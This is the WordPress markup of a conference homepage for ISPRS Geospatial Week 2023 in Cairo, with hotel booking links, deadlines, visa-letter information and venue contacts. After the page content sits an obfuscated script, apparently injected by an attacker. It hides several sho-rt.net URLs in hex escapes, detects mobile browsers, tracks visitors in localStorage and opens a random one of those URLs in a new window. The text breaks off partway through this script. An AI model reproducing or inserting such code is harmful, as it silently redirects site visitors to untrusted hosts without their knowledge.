!important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function 